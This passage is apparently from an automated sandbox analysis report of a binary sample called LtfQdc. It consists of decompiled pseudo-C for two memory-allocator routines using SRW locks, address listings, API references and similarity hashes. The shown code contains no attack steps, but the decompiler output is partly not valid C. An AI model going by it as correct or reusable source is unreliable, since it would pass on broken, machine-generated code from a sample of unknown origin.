												if((_t257 & 0x00000001) != 0 || _t463 == 0) {
													L00C92150(_t370, _t493, 1);
												}
												__imp__ReleaseSRWLockExclusive(_t335);
												goto L23;
											}
										}
									} else {
										_t250 =  *(_v24 + 8);
										_t372 = _t455 + 0x48;
										if(_t372 > _t250 || _t455 + 0x1148 < _t250) {
											goto L58;
										} else {
											_t432 =  *0xd43e38; // 0x0
											_t342 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t432 * 4)) + 0xa0));
											if(_t342 < 2) {
												goto L58;
											} else {
												_t250 = _t250 - _t372 >> 5;
												 *((intOrPtr*)(_t342 + 0x30)) =  *((intOrPtr*)(_t342 + 0x30)) + 1;
												asm("adc dword [ebx+0x34], 0x0");
												if(_t250 > ( *0xd42d20 & 0x0000ffff)) {
													 *((intOrPtr*)(_t342 + 0x40)) =  *((intOrPtr*)(_t342 + 0x40)) + 1;
													asm("adc dword [ebx+0x44], 0x0");
													goto L58;
												} else {
													asm("bswap ecx");
													 *_t447 =  *(_t342 + 0x58 + _t250 * 8);
													 *(_t342 + 0x58 + _t250 * 8) = _t447;
													 *((char*)(_t342 + 0x5c + _t250 * 8)) =  *((char*)(_t342 + 0x5c + _t250 * 8)) + 1;
													 *_t342 =  *_t342 + ( *(_t342 + 0x5e + _t250 * 8) & 0x0000ffff);
													 *((intOrPtr*)(_t342 + 0x38)) =  *((intOrPtr*)(_t342 + 0x38)) + 1;
													asm("adc dword [ebx+0x3c], 0x0");
													_t376 =  *(_t342 + 0x5d + _t250 * 8) & 0x000000ff;
													if( *((intOrPtr*)(_t342 + 0x5c + _t250 * 8)) > _t376) {
														_push((_t376 & 0x000000ff) >> 1);
														_push(_t342 + _t250 * 8 + 0x58);
														E00CC87A0(_t342, _t342, _t447);
													}
													if(( *(_t342 + 4) & 1) != 0) {
														L00CC7E00(_t342);
													}
													goto L23;
												}
											}
										}
									}
								} else {
									if((_t415 & 0x00000fff) == 0) {
										_t338 = (_t415 >> 0x00000009 & 0x00000ff8) + (_t415 & 0xffe00000) + 0x2000;
									} else {
										_t338 = _t415 - 4;
									}
									if(( *_t338 & 0x7fffffff) != 1 &&  *((char*)(_t455 + 7)) != 0) {
										_v28 = _t415;
										if(( *(_t447 + 0xf) & 0x00000008) != 0) {
											_t276 = _t447 + 0x20;
										} else {
											_t276 =  *((intOrPtr*)(_t447 + 8)) + 0xc;
										}
										E00D011A0(_t447, _a8, 0xef,  *_t276 -  *((intOrPtr*)(_t455 + 0xc)));
										_t469 = _t469 + 0xc;
										_t415 = _v28;
									}
									_t241 =  *_t338;
									do {
										asm("lock cmpxchg [ebx], ecx");
									} while ((_t241 & 0xfffffffe) != 0);
									if((_t241 & 0x00000001) == 0) {
										L45:
										_t367 = _t338;
										_push(_t241);
										_t242 = E00CD41F0(_t338, _t415, _t447);
										goto L46;
									} else {
										_t250 = _t241 & 0x7fffffff;
										if(_t250 != 1) {
											asm("lock add [esi+0x1198], eax");
											asm("lock inc dword [esi+0x119c]");
											asm("lock add [esi+0x11a0], eax");
											asm("lock inc dword [esi+0x11a4]");
											L23:
											_t415 = _v20;
											goto L43;
										} else {
											goto L16;
										}
									}
								}
							}
						}
					}
				}
			}

0x00cd3550
0x00cd3553
0x00cd3554
0x00cd3556
0x00cd3559
0x00cd355c
0x00cd3561
0x00cd371c
0x00cd3720
0x00000000
0x00cd3726
0x00cd3726
0x00cd372b
0x00cd3730
0x00cd373b
0x00cd3755
0x00cd375a
0x00cd375d
0x00cd375f
0x00cd3762
0x00cd3768
0x00cd376b
0x00cd3a1f
0x00cd3ce4
0x00cd3ce9
0x00cd3cec
0x00cd3cec
0x00cd3a27
0x00cd3a33
0x00000000
0x00cd3a39
0x00cd3a39
0x00cd3a3b
0x00cd3a3e
0x00cd3a45
0x00cd3cf3
0x00cd3a4b
0x00cd3a4e
0x00cd3a4e
0x00cd3a51
0x00cd3a5b
0x00cd3a6b
0x00cd3a70
0x00cd3a70
0x00cd3aa3
0x00cd3aad
0x00cd3ab7
0x00cd3abf
0x00cd3ac5
0x00cd3ad2
0x00cd3ae9
0x00cd3aee
0x00cd3aee
0x00cd3ad2
0x00000000
0x00cd3abf
0x00cd3771
0x00cd3771
0x00cd3775
0x00cd37c1
0x00cd37c5
0x00cd3afe
0x00cd3afe
0x00cd3b01
0x00cd3b07
0x00cd3b0b
0x00cd3b13
0x00cd3b17
0x00cd3b17
0x00cd3b1c
0x00cd3b25
0x00cd3b2b
0x00cd3b2f
0x00000000
0x00cd3b35
0x00cd3b35
0x00cd3b37
0x00cd3b39
0x00cd3b3b
0x00cd3b40
0x00cd3b46
0x00cd3b4e
0x00000000
0x00cd3b54
0x00cd3b5a
0x00cd3b6a
0x00cd3b6f
0x00cd3cbe
0x00cd3cbe
0x00cd3b7e
0x00000000
0x00cd3b7e
0x00cd3b4e
0x00cd37cb
0x00cd37ce
0x00cd37d1
0x00cd37d6
0x00000000
0x00cd37dc
0x00cd37dc
0x00cd37e4
0x00000000
0x00cd37ea
0x00cd37ea
0x00cd37f7
0x00cd37fa
0x00cd3803
0x00000000
0x00cd3809
0x00cd380b
0x00cd380e
0x00cd3812
0x00cd381f
0x00cd3af6
0x00cd3afa
0x00000000
0x00cd3825
0x00cd3829
0x00cd382b
0x00cd382e
0x00cd3830
0x00cd3834
0x00cd383d
0x00cd383f
0x00cd3843
0x00cd3847
0x00cd3850
0x00cd3b96
0x00cd3b97
0x00cd3b98
0x00cd3b98
0x00cd385c
0x00cd3ba4
0x00cd3ba4
0x00000000
0x00cd385c
0x00cd381f
0x00cd3803
0x00cd37e4
0x00cd37d6
0x00cd3777
0x00cd377d
0x00cd3c11
0x00cd3783
0x00cd3783
0x00cd3783
0x00cd3790
0x00cd3c8a
0x00cd3d07
0x00cd3c8c
0x00cd3c92
0x00cd3c92
0x00cd3ca1
0x00cd3ca6
0x00cd3ca9
0x00cd3ca9
0x00cd379c
0x00cd37a0
0x00cd37a5
0x00cd37a5
0x00cd37ad
0x00000000
0x00cd37b3
0x00cd37b3
0x00cd37bb
0x00cd3c25
0x00cd3c2c
0x00cd3c39
0x00cd3c40
0x00000000
0x00000000
0x00000000
0x00000000
0x00cd37bb
0x00cd37ad
0x00cd3775
0x00cd376b
0x00cd3567
0x00cd3567
0x00cd3576
0x00cd386e
0x00cd386f
0x00cd386f
0x00cd357e
0x00cd3585
0x00cd3862
0x00cd3862
0x00000000
0x00cd358b
0x00cd358b
0x00cd358f
0x00cd3864
0x00cd386d
0x00cd3595
0x00cd3597
0x00cd359c
0x00cd359e
0x00cd35a7
0x00cd35b0
0x00cd35c6
0x00cd35d0
0x00cd35d6
0x00cd387e
0x00cd387e
0x00cd35dc
0x00cd35df
0x00cd35df
0x00cd35e9
0x00cd35ed
0x00cd35f1
0x00cd35f5
0x00cd35fa
0x00cd35fd
0x00cd3600
0x00cd3609
0x00cd360e
0x00cd3611
0x00cd3613
0x00cd3619
0x00cd388f
0x00cd3cc8
0x00cd3ccc
0x00cd3cd1
0x00cd3cd3
0x00cd3cd3
0x00cd3897
0x00cd38a3
0x00000000
0x00cd38a9
0x00cd38a9
0x00cd38ab
0x00cd38ad
0x00cd38b4
0x00cd3cdc
0x00cd38ba
0x00cd38ba
0x00cd38ba
0x00cd38bd
0x00cd38c7
0x00cd38d5
0x00cd38da
0x00cd38da
0x00cd390c
0x00cd3916
0x00cd3920
0x00cd3928
0x00cd392e
0x00cd393b
0x00cd3952
0x00cd3957
0x00cd3957
0x00cd393b
0x00000000
0x00cd3928
0x00cd361f
0x00cd361f
0x00cd3623
0x00cd3671
0x00cd3671
0x00cd3674
0x00cd367a
0x00cd3967
0x00cd3967
0x00cd396d
0x00cd3971
0x00cd3979
0x00cd397d
0x00cd397d
0x00cd3982
0x00cd398b
0x00cd3991
0x00cd3995
0x00cd3d0c
0x00cd3d0d
0x00000000
0x00cd399b
0x00cd399b
0x00cd399d
0x00cd399f
0x00cd39a1
0x00cd39ac
0x00cd39b4
0x00cd3d0f
0x00cd3d0f
0x00cd3d10
0x00cd3d12
0x00cd3d12
0x00cd3d13
0x00cd3d15
0x00cd3d15
0x00cd3d16
0x00cd3d18
0x00cd3d19
0x00cd3d1a
0x00cd3d1b
0x00cd3d1c
0x00cd3d1d
0x00cd3d1e
0x00cd3d1f
0x00cd3d23
0x00cd3d24
0x00cd3d27
0x00cd3d2f
0x00cd3d58
0x00cd3d58
0x00cd3d31
0x00cd3d3e
0x00cd3d40
0x00cd3d5c
0x00cd3d5d
0x00cd3d5d
0x00cd3d4b
0x00cd3d52
0x00cd39ba
0x00cd39ba
0x00cd39c2
0x00cd39d2
0x00cd39d7
0x00cd3cb2
0x00cd3cb2
0x00cd39e6
0x00000000
0x00cd39e6
0x00cd39b4
0x00cd3680
0x00cd3683
0x00cd3686
0x00cd368b
0x00000000
0x00cd369f
0x00cd369f
0x00cd36af
0x00cd36b8
0x00000000
0x00cd36be
0x00cd36c0
0x00cd36c3
0x00cd36c7
0x00cd36d4
0x00cd395f
0x00cd3963
0x00000000
0x00cd36da
0x00cd36de
0x00cd36e0
0x00cd36e2
0x00cd36e6
0x00cd36ef
0x00cd36f1
0x00cd36f5
0x00cd36f9
0x00cd3702
0x00cd39fe
0x00cd39ff
0x00cd3a00
0x00cd3a00
0x00cd370e
0x00cd3a0c
0x00cd3a0c
0x00000000
0x00cd370e
0x00cd36d4
0x00cd36b8
0x00cd368b
0x00cd3625
0x00cd362b
0x00cd3bc3
0x00cd3631
0x00cd3631
0x00cd3631
0x00cd363e
0x00cd3c4e
0x00cd3c55
0x00cd3cfc
0x00cd3c5b
0x00cd3c5e
0x00cd3c5e
0x00cd3c70
0x00cd3c75
0x00cd3c7b
0x00cd3c7b
0x00cd364a
0x00cd3650
0x00cd3655
0x00cd3655
0x00cd365d
0x00cd3876
0x00cd3876
0x00cd3878
0x00cd3879
0x00000000
0x00cd3663
0x00cd3663
0x00cd366b
0x00cd3bd4
0x00cd3bdb
0x00cd3be8
0x00cd3bef
0x00cd3714
0x00cd3714
0x00000000
0x00000000
0x00000000
0x00000000
0x00cd366b
0x00cd365d
0x00cd3623
0x00cd3619
0x00cd358f
0x00cd3585

APIs

TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00CD3971
ReleaseSRWLockExclusive.KERNEL32(?), ref: 00CD39E6
TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00CD3B0B
ReleaseSRWLockExclusive.KERNEL32(?), ref: 00CD3B7E

Strings

, xrefs: 00CD3CF3

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID:
API String ID: 17069307-3916222277
Opcode ID: 2ed1614961c433ab58711857e5355f31fa3e5da8ca4a8942a08963cc8730822e
Instruction ID: 8a16d5753fb437560451a258ac6a85a5eec493c1f3e59486408d6397c5541bd4
Opcode Fuzzy Hash: 2ed1614961c433ab58711857e5355f31fa3e5da8ca4a8942a08963cc8730822e
Instruction Fuzzy Hash: 9D223271B002818FDB18CF69C884B75B7A2FF41314F18856EEA698B386D735EE41DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00CD2380 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 454
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E00CD2380(void* __fp0, signed int _a8, intOrPtr _a12) {
				void* _v16;
				signed int _v24;
				signed int _v28;
				char _v48;
				char _v49;
				char _v52;
				char _v53;
				signed int _v56;
				char _v57;
				signed int _v60;
				signed int _v61;
				intOrPtr _v64;
				signed int _v68;
				signed char _v69;
				signed short _v72;
				signed short _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				signed int _v92;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t171;
				signed int _t172;
				signed int _t173;
				signed int _t177;
				signed char _t178;
				signed short* _t179;
				intOrPtr _t187;
				signed short* _t192;
				void* _t194;
				signed int _t197;
				signed int _t203;
				void* _t206;
				signed int _t210;
				signed int _t212;
				signed int _t219;
				signed int _t220;
				signed int _t226;
				signed int _t228;
				signed int _t232;
				signed int _t236;
				signed short _t241;
				signed int _t246;
				intOrPtr _t249;
				intOrPtr _t250;
				unsigned int _t254;
				intOrPtr _t259;
				signed int _t260;
				signed int _t263;
				signed int _t268;
				signed int _t282;
				signed char _t283;
				signed int _t284;
				signed int _t290;
				signed char _t291;
				void* _t299;
				intOrPtr _t300;
				intOrPtr _t302;
				signed short _t306;
				signed int _t313;
				void* _t317;
				signed short _t318;
				signed int _t319;
				void* _t320;
				signed short** _t322;
				char* _t326;
				intOrPtr* _t329;
				signed int _t331;
				signed short _t336;
				signed short _t337;
				signed int _t344;
				signed int _t345;
				void* _t347;
				void* _t365;
				void* _t370;
				void* _t382;

				_t382 = __fp0;
				_t347 = (_t345 & 0xfffffff0) - 0x40;
				_t171 = _a8;
				_t228 =  *0xd40014; // 0xfbddd969
				_v24 = _t228 ^ _t344;
				_t232 = (( *0xd53ec0 & 0x000000ff) << 3) + _a12;
				if(_t232 < 0) {
					asm("int3");
					_t293 = _t171 * 0 >> 0x20;
					_t172 = _t171 * 0;
					__eflags = _t172;
					if(_t172 >= 0) {
						L2:
						_t335 = _t172;
						L3:
						_t173 =  *0xd515c0; // 0xd51600
						if(_t173 == 0) {
							_t173 = E00CD4240(_t219, _t293, _t317);
							__eflags = _t335;
							if(_t335 != 0) {
								L5:
								_t318 = _t335;
								L6:
								_t319 = _t318 +  *((intOrPtr*)(_t173 + 0xc));
								if(_t319 < _t335) {
									L85:
									asm("int3");
									asm("ud2");
									L86:
									__imp__ReleaseSRWLockExclusive(_v72);
									_t320 = 0;
									L42:
									E00CFE643(_t173, _t219, _v28 ^ _t344, _t293, _t320, _t335);
									return _t320;
								}
								_t236 =  *(_t173 + 2) & 0x000000ff;
								_v76 = _t173;
								_v60 = _t319;
								if(_t236 == 2) {
									_t237 = 0x20;
									__eflags = _t319;
									if(_t319 != 0) {
										asm("bsr ecx, edi");
										_t237 = 0x3f;
										__eflags = 0x20;
									}
									_t177 = 0x20 - _t237;
									_t293 = _t319 >> ( *(0xd35a40 - _t237) & 0x000000ff) & 0x00000007;
									_t178 = (_t319 >> ( *(0xd35a40 - _t237) & 0x000000ff) & 0x00000007) + _t177 * 8;
									__eflags = ( *(0xd35a44 + _t177 * 4) & _t319) - 1;
									asm("sbb eax, 0xffffffff");
									_t18 = _t178 + 0xd3580c; // 0x0
									_t335 =  *(_t178 + _t18) & 0x0000ffff;
								} else {
									if(_t236 != 1) {
										_t309 = 0x20;
										__eflags = _t319;
										if(_t319 != 0) {
											asm("bsr edx, edi");
											_t309 = 0x3f;
											__eflags = 0x20;
										}
										_t210 = 0x20 - _t309;
										_t282 =  *(0xd35a44 + _t210 * 4) & _t319;
										_t211 = (_t319 >> ( *(0xd35a40 - _t309) & 0x000000ff) & 0x00000007) + _t210 * 8;
										__eflags = _t282 - 1;
										asm("sbb eax, 0xffffffff");
										_t24 = _t211 + 0xd3580c; // 0x0
										_t178 =  *((_t319 >> ( *(0xd35a40 - _t309) & 0x000000ff) & 0x00000007) + _t210 * 8 + _t24) & 0x0000ffff;
										__eflags = _t319 - 0x41;
										_t283 = _t282 & 0xffffff00 | _t319 - 0x00000041 >= 0x00000000;
										__eflags = _t178 - 0x76;
										_t293 = (_t309 & 0xffffff00 | __eflags > 0x00000000) & _t283;
										_t335 = (_t309 & 0xffffff00 | __eflags > 0x00000000) & _t283 & 0x000000ff | _t178;
									} else {
										_t284 = _t319 - 0x101;
										_t212 = _t319;
										if(_t284 <= 0xfefe) {
											if(_t319 == 1) {
												_t291 = 0x20;
											} else {
												asm("bsr ecx, eax");
												_t291 = _t284 ^ 0x0000001f;
											}
											_t212 =  <  ? 1 <<  ~_t291 : 0xbadbb1 >> 2;
										}
										_t342 = 0x20;
										if(_t212 != 0) {
											asm("bsr esi, eax");
											_t342 = 0x3f;
										}
										_t313 = (_t212 >> ( *(0xd35a40 - _t342) & 0x000000ff) & 0x00000007) + (0x20 - _t342) * 8;
										asm("sbb edx, 0xffffffff");
										_t36 = _t313 + 0xd3580c; // 0x0
										_t290 =  *(_t313 + _t36) & 0x0000ffff;
										_t178 = _t212 & 0xffffff00 | _t212 - 0x00000041 >= 0x00000000;
										_t365 = _t290 - 0x76;
										_t293 = (_t313 & 0xffffff00 | _t365 > 0x00000000) & _t178;
										_t335 = (_t313 & 0xffffff00 | _t365 > 0x00000000) & _t178 & 0x000000ff | _t290;
									}
								}
								_v49 = 0;
								_v56 = 0xffffffff;
								_t241 = _v76;
								_t220 =  *_t241 & 0x000000ff;
								if(_t220 == 2) {
									_t178 =  *0xd43d89 & 0x000000ff;
									__eflags = _t178 & 0x00000001;
									if((_t178 & 0x00000001) != 0) {
										_t178 = L00CD7BD0(_t220, _t382);
										_t241 = _v76;
									}
								}
								_v61 = _t220;
								if( *((char*)(_t241 + 3)) == 0) {
									_t219 = (_t335 & 0x0000ffff) << 5;
									_t322 = _t241 + _t219 + 0x48;
									_t336 = _t241 + 0x40;
									__imp__TryAcquireSRWLockExclusive(_t336);
									__eflags = _t178;
									if(_t178 == 0) {
										L00CC8B90(_t178, _t336);
									}
									_v76 = _t336;
									_t179 =  *_t322;
									_t335 =  *_t179;
									__eflags = _t335;
									if(_t335 == 0) {
										goto L78;
									} else {
										_t302 = _v80;
										_v53 = 0;
										_t259 =  *((intOrPtr*)(_t302 + 0x48 + _t219 + 0xc));
										_t219 = _t259 -  *((intOrPtr*)(_t302 + 0xc));
										_t293 =  *_t335;
										__eflags = _t293;
										_v72 = _t335;
										if(_t293 == 0) {
											_t260 = 0;
											__eflags = 0;
											L71:
											_t335 = _v76;
											 *_t179 = _t260;
											goto L74;
										}
										_v64 = _t259;
										_t260 = _t293;
										asm("bswap ecx");
										__eflags = (_t260 ^ _t335) - 0x1fffff;
										if((_t260 ^ _t335) > 0x1fffff) {
											L82:
											asm("pcmpeqd xmm0, xmm0");
											asm("movdqa [esp+0x20], xmm0");
											_t326 =  &_v52;
											_t194 = E00CC88D0(_t326, "first", _t293, 0);
											_push(_t326);
											goto L84;
										}
										__eflags = _t260 & 0x001fc000;
										if((_t260 & 0x001fc000) == 0) {
											goto L82;
										}
										asm("prefetcht0 [ecx]");
										goto L71;
									}
								} else {
									_t197 =  *0xd43e38; // 0x0
									_t329 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t197 * 4)) + 0xa0));
									_t293 = _t335 & 0x0000ffff;
									_v72 = _t293;
									if(_t329 < 2) {
										_push( &_v56);
										_push(_t293);
										_t173 = E00CD9960(_t241);
										_t250 = _v84;
										__eflags = _t173;
										if(_t173 != 0) {
											L34:
											_t219 = _v52 -  *((intOrPtr*)(_t250 + 0xc));
											L35:
											_t320 =  *((intOrPtr*)(_t250 + 0x10)) + _t173;
											if(_v57 == 0) {
												_t335 = _t173;
												E00D011A0(_t320, _t320, 0, _t219);
												_t250 = _v84;
											}
											_t293 = _v69 & 0x000000ff;
											if( *((char*)(_t250 + 6)) != 0) {
												if((_t173 & 0x00000fff) == 0) {
													_t254 = _t173;
													_t335 = _t254;
													_t192 = (_t173 & 0xffe00000) + (_t254 >> 0x00000009 & 0x00000ff8) + 0x2000;
												} else {
													_t335 = _t173;
													_t192 = _t173 + 0xfffffffc;
												}
												 *_t192 = 1;
												_t173 = _t335;
											}
											if(_t293 == 2) {
												_t219 = _t173;
												_t173 = _t173 >> 0x15;
												__eflags =  *((short*)(_t173 + _t173 + 0xd42d24)) - 0xfffe;
												if( *((short*)(_t173 + _t173 + 0xd42d24)) == 0xfffe) {
													_t173 = _t219 & 0xffe00000;
													_t293 = 3 << (_t219 >> 0x00000002 & 0x0000001e);
													_t219 = _t219 >> 0x00000005 & 0x0000fffc;
													asm("lock or [ebx+eax+0x4000], edx");
												}
											}
											goto L42;
										}
										L59:
										_t226 = _v68;
										L61:
										_t219 = _t226 << 5;
										_t322 = _t250 + _t219 + 0x48;
										_t337 = _t250 + 0x40;
										__imp__TryAcquireSRWLockExclusive(_t337);
										__eflags = _t173;
										if(_t173 == 0) {
											L00CC8B90(_t173, _t337);
										}
										_v72 = _t337;
										_t179 =  *_t322;
										_t335 =  *_t179;
										__eflags = _t335;
										if(_t335 == 0) {
											L78:
											_t173 = L00CD87D0(_t322, _v80, 2, _v64, 0x4000,  &_v53); // executed
											_v92 = _t173;
											__eflags = _t173;
											if(_t173 == 0) {
												goto L86;
											}
											_t299 = (_v72 >> 0x00000009 & 0x00000fe0) + (_v72 & 0xffe00000) - (( *((_v72 >> 0x00000009 & 0x00000fe0) + (_v72 & 0xffe00000) + 0x101e) & 0x3f) << 5);
											_t179 = _t299 + 0x1000;
											__eflags =  *(_t299 + 0x100f) & 0x00000008;
											if(( *(_t299 + 0x100f) & 0x00000008) != 0) {
												_t246 =  &(_t179[0x10]);
											} else {
												_t246 = _t179[4] + 0xc;
												__eflags = _t246;
											}
											_t219 =  *_t246 -  *((intOrPtr*)(_v80 + 0xc));
											_t335 = _v76;
											goto L75;
										} else {
											_t306 = _v76;
											_v49 = 0;
											_t268 =  *(_t306 + 0x48 + _t219 + 0xc);
											_t219 = _t268 -  *((intOrPtr*)(_t306 + 0xc));
											_t331 =  *_t335;
											__eflags = _t331;
											_v68 = _t335;
											if(_t331 == 0) {
												__eflags = 0;
												L73:
												_t335 = _v72;
												 *_t179 = 0;
												L74:
												_t263 = _t179[6] & 0xffffc001 | _t179[6] + 0x00000002 & 0x00003ffe;
												__eflags = _t263;
												_t179[6] = _t263;
												L75:
												_t300 = _v80;
												_t187 =  *((intOrPtr*)(_t300 + 0x117c)) +  *(_t179[4] + 0xc);
												 *((intOrPtr*)(_t300 + 0x117c)) = _t187;
												_t249 =  *((intOrPtr*)(_t300 + 0x1180));
												__eflags = _t249 - _t187;
												_t188 =  >  ? _t249 : _t187;
												 *((intOrPtr*)(_t300 + 0x1180)) =  >  ? _t249 : _t187;
												__imp__ReleaseSRWLockExclusive(_t335);
												_t250 = _v84;
												_t173 = _v76;
												goto L35;
											}
											_v60 = _t268;
											_t293 = _t331;
											asm("bswap edx");
											__eflags = (_t293 ^ _t335) - 0x1fffff;
											if((_t293 ^ _t335) > 0x1fffff) {
												L83:
												asm("pcmpeqd xmm0, xmm0");
												asm("movdqa [esp+0x20], xmm0");
												_t219 =  &_v48;
												_t194 = E00CC88D0(_t219, "first", _t331, 0);
												_push(_t219);
												L84:
												E00C90790(_t194);
												_t173 = E00CC8960(_v64, _t382);
												goto L85;
											}
											__eflags = _t293 & 0x001fc000;
											if((_t293 & 0x001fc000) == 0) {
												goto L83;
											}
											asm("prefetcht0 [edx]");
											goto L73;
										}
									}
									 *((intOrPtr*)(_t329 + 8)) =  *((intOrPtr*)(_t329 + 8)) + 1;
									asm("adc dword [edi+0xc], 0x0");
									_t226 = _t335 & 0x0000ffff;
									_t370 =  *0xd42d20 - _t226; // 0x1f
									if(_t370 < 0) {
										 *((intOrPtr*)(_t329 + 0x28)) =  *((intOrPtr*)(_t329 + 0x28)) + 1;
										asm("adc dword [edi+0x2c], 0x0");
										 *((intOrPtr*)(_t329 + 0x18)) =  *((intOrPtr*)(_t329 + 0x18)) + 1;
										asm("adc dword [edi+0x1c], 0x0");
										goto L61;
									}
									if( *(_t329 + 0x58 + _t226 * 8) == 0) {
										 *((intOrPtr*)(_t329 + 0x20)) =  *((intOrPtr*)(_t329 + 0x20)) + 1;
										asm("adc dword [edi+0x24], 0x0");
										 *((intOrPtr*)(_t329 + 0x18)) =  *((intOrPtr*)(_t329 + 0x18)) + 1;
										asm("adc dword [edi+0x1c], 0x0");
										E00CC85A0(_t329, _t226);
										_t250 = _v80;
										_t173 =  *(_t329 + 0x58 + _t226 * 8);
										__eflags = _t173;
										if(_t173 != 0) {
											L29:
											_v68 =  *(_t329 + 0x5e + _t226 * 8) & 0x0000ffff;
											_t335 = _t173;
											_t203 =  *_t173;
											if(_t203 == 0) {
												_t293 = 0;
												__eflags = 0;
												L33:
												 *((char*)(_t329 + 0x5c + _t226 * 8)) =  *((char*)(_t329 + 0x5c + _t226 * 8)) - 1;
												 *(_t329 + 0x58 + _t226 * 8) = _t293;
												_v56 = _v68;
												 *_t329 =  *_t329 - ( *(_t329 + 0x5e + _t226 * 8) & 0x0000ffff);
												_t173 = _t335;
												if(_t173 == 0) {
													goto L59;
												}
												goto L34;
											}
											_t293 = _t203;
											asm("bswap edx");
											if((_t293 & 0x001fc000) == 0) {
												asm("pcmpeqd xmm0, xmm0");
												asm("movdqa [esp+0x20], xmm0");
												_t322 =  &_v48;
												_t206 = E00CC88D0(_t322, "first", _t203, 0);
												_push(_t322);
												E00C90790(_t206);
												_t347 = _t347 + 4;
												E00CC8960(_v80, _t382);
												goto L78;
											}
											asm("prefetcht0 [edx]");
											goto L33;
										}
										goto L61;
									}
									 *((intOrPtr*)(_t329 + 0x10)) =  *((intOrPtr*)(_t329 + 0x10)) + 1;
									asm("adc dword [edi+0x14], 0x0");
									goto L29;
								}
							}
							L53:
							_t318 = 1;
							goto L6;
						}
						if(_t335 == 0) {
							goto L53;
						}
						goto L5;
					}
					L51:
					asm("int3");
					_t335 = 0;
					goto L3;
				}
				_t293 = _t171 * _t232 >> 0x20;
				_t172 = _t171 * _t232;
				if(_t172 < 0) {
					goto L51;
				}
				goto L2;
			}

0x00cd2380
0x00cd2389
0x00cd238c
0x00cd238f
0x00cd2397
0x00cd23a5
0x00cd23a8
0x00cd26d6
0x00cd26d9
0x00cd26d9
0x00cd26d9
0x00cd26db
0x00cd23b6
0x00cd23b6
0x00cd23b8
0x00cd23b8
0x00cd23bf
0x00cd26e9
0x00cd26ee
0x00cd26f0
0x00cd23cd
0x00cd23cd
0x00cd23cf
0x00cd23cf
0x00cd23d4
0x00cd29a4
0x00cd29a4
0x00cd29a5
0x00cd29a7
0x00cd29ab
0x00cd29b1
0x00cd263f
0x00cd2645
0x00cd2653
0x00cd2653
0x00cd23da
0x00cd23e1
0x00cd23e5
0x00cd23e9
0x00cd241d
0x00cd2422
0x00cd2424
0x00cd2426
0x00cd2429
0x00cd2429
0x00cd2429
0x00cd242c
0x00cd243c
0x00cd2448
0x00cd244b
0x00cd244e
0x00cd2451
0x00cd2451
0x00cd23eb
0x00cd23ee
0x00cd2463
0x00cd2468
0x00cd246a
0x00cd246c
0x00cd246f
0x00cd246f
0x00cd246f
0x00cd2480
0x00cd248c
0x00cd248e
0x00cd2491
0x00cd2494
0x00cd2497
0x00cd2497
0x00cd249f
0x00cd24a2
0x00cd24a5
0x00cd24ac
0x00cd24b1
0x00cd23f0
0x00cd23f0
0x00cd23f6
0x00cd23fe
0x00cd2407
0x00cd24b5
0x00cd240d
0x00cd240d
0x00cd2410
0x00cd2410
0x00cd24cf
0x00cd24cf
0x00cd24d7
0x00cd24de
0x00cd24e0
0x00cd24e3
0x00cd24e3
0x00cd2502
0x00cd2508
0x00cd250b
0x00cd250b
0x00cd2516
0x00cd2519
0x00cd2520
0x00cd2525
0x00cd2525
0x00cd23ee
0x00cd2527
0x00cd252c
0x00cd2534
0x00cd2538
0x00cd253e
0x00cd2700
0x00cd2707
0x00cd2709
0x00cd270f
0x00cd2714
0x00cd2714
0x00cd2709
0x00cd2548
0x00cd254c
0x00cd2657
0x00cd265d
0x00cd2660
0x00cd2664
0x00cd266a
0x00cd266c
0x00cd2670
0x00cd2670
0x00cd2675
0x00cd2679
0x00cd267b
0x00cd267d
0x00cd267f
0x00000000
0x00cd2685
0x00cd2685
0x00cd268c
0x00cd2691
0x00cd2697
0x00cd269a
0x00cd269c
0x00cd269e
0x00cd26a2
0x00cd282f
0x00cd282f
0x00cd2831
0x00cd2831
0x00cd2835
0x00000000
0x00cd2835
0x00cd26a8
0x00cd26ac
0x00cd26ae
0x00cd26b4
0x00cd26ba
0x00cd2955
0x00cd2955
0x00cd2959
0x00cd295f
0x00cd296d
0x00cd2972
0x00000000
0x00cd2972
0x00cd26c2
0x00cd26c8
0x00000000
0x00000000
0x00cd26ce
0x00000000
0x00cd26ce
0x00cd2552
0x00cd2552
0x00cd2561
0x00cd2567
0x00cd256d
0x00cd2571
0x00cd2761
0x00cd2762
0x00cd2763
0x00cd2768
0x00cd276c
0x00cd276e
0x00cd25ec
0x00cd25f0
0x00cd25f3
0x00cd25f6
0x00cd25fd
0x00cd2603
0x00cd2605
0x00cd260c
0x00cd2610
0x00cd2617
0x00cd261c
0x00cd2623
0x00cd2893
0x00cd289a
0x00cd28a7
0x00cd2629
0x00cd2629
0x00cd262b
0x00cd262b
0x00cd262e
0x00cd2634
0x00cd2634
0x00cd2639
0x00cd271d
0x00cd271f
0x00cd2722
0x00cd272b
0x00cd2733
0x00cd2745
0x00cd274a
0x00cd2750
0x00cd2750
